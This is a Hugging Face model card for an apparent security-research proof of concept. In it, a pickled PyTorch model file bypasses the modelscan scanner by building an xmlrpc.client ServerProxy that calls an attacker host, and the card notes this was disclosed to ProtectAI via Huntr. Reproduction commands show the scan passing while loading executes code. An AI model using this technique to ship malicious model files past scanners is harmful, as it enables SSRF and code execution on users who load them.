Hugging Face's logo

manja316
/
modelscan-bypass-xmlrpc-ssrf

PyTorch
security-research
modelscan-bypass
Model card Files
xet
 Community

Modelscan Bypass PoC: xmlrpc.client.ServerProxy SSRF

Security research only. Do not use for malicious purposes.

Summary

Creates XML-RPC ServerProxy to attacker host. xmlrpc.client is not in modelscan's unsafe_globals blocklist. Any attribute access on the loaded object triggers HTTP call to attacker.

Reproduction 

pip install modelscan
modelscan scan -p pytorch_model.bin
# Result: No issues found

python3 -c "import pickle; pickle.load(open('pytorch_model.bin', 'rb'))"
# Result: Code executes

Affected

  • modelscan 0.7.6 (latest as of 2026-04-11)

Disclosure

Submitted to ProtectAI via Huntr.

Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support